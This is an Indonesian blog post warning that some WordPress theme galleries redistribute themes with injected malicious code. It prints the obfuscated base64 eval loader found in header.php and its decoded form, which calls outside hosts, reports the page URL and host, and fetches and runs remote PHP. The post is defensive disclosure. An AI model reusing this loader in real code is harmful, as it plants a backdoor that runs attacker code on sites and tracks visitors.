Malicious code in redistributed WordPress theme

Hati-hati, sekarang ada beberapa web site theme gallery yg mendistribusikan ulang WordPress theme yg sudah ditambahkan kode berbahaya. Kode ini bisa men-tracking pengunjung blog kita atau bahkan menampilkan iklan pada blog kita.

Dari website 5thirtyone, disebutkan paling tidak ada dua theme gallery yg melakukan kecurangan ini, yaitu WPSphere.com dan TemplatesBrowser.com.

Barusan aku coba download theme i-theme dari WPSphere, ini theme dg tampilan seperti Mac yg banyak dipakai oleh teman-teman blogger di Indonesia, dan berikut ini kode berbahaya yg aku temukan pada baris ke 21 file header.php nya:

21
<body><?php @eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29
ja29wZW4oInd3dy53cHNzci5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUy
NUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgP
SAid3Bzc3IiOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy
53cHNuYy5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ
3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBl
bHNlICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIjsgQGV2YWwoJyRSMTRBRjFCRTlFR
TI2QTkwOTIxRTY0QTgyRTc4MzY3OTcgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3ODM2Nzk3IE
FORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9
ICIxIjsgICRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cDovL3d3dy4kUjUwRjVGOUM4MEYxM
kZGQUU4QjI0MDA1MjhFODFCMzRFLmNvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waHA/dXJsPS
IuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkV
SWydIVFRQX0hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwID0gQGZpbGVfZ2V0X2NvbnRl
bnRzKCRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOUI3RTZDN
zM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJF
I2RTRGMTRCMzM1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNTBGNUY5QzgwRjEyRkZBRThCMj
QwMDUyOEU4MUIzNEUuY29tL3ckUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdXJsZW
5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUV
FBfSE9TVCddKTsgIEByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMTE1KTsgfSBmY2xvc2U
oJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7')); ?>

Dengan adanya modus seperti ini, mau ga mau setiap kali kita mendownload theme dari sebuah theme gallery, pastikan tidak ada kode berbahaya seperti diatas, atau kalau ga ngerti, cari saja alamat pembuat aslinya dan download langsung dari situs pembuatnya itu.

Kode dalam format base64 diatas kalau kita ubah ke bentuk yg agak bisa dimengerti akan jadi seperti ini:

1
if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen(”www.wpssr.com”, 80, $R32D00070D4FFBCCE2F
C669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFAE8B2400528E81B34E
= “wpssr”; elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen(”www.wpsnc.com”, 80, $R3
2D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFA
E8B2400528E81B34E = “wpsnc”; else $R50F5F9C80F12FFAE8B2400528E81B34E = “wpsnc2?; @eval($R1
4AF1BE9EE26A90921E64A82E7836797 = 1;); if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get
(’allow_url_fopen’)) { $RD3FE9C10A808A54EA2A3DBD9E605B696 =1?; $R6E4F14B335243BE656C65
E3ED9E1B115 = “http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3
DBD9E605B696.php?url=”. urlencode($_SERVER[’REQUEST_URI’]) .”&”. “host=”. urlencode($_
SERVER[’HTTP_HOST’]); $R3E33E017CD76B9B7E6C7364FB91E2E90 = @file_get_contents($R6E4F1
4B335243BE656C65E3ED9E1B115); @eval($R3E33E017CD76B9B7E6C7364FB91E2E90); } else { $RD
3FE9C10A808A54EA2A3DBD9E605B696 = “0?; $R6E4F14B335243BE656C65E3ED9E1B115 = “http://www.
$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=”.
urlencode($_SERVER[’REQUEST_URI’]) .”&”. “host=”. urlencode($_SERVER[’HTTP_HOST’]);
@readfile($R6E4F14B335243BE656C65E3ED9E1B115); } fclose($R37C014DAE5FE4FE5C77B6735ABC30916);

Ehm.. Sangat-sangat mencurigakan!

Leave a Comment.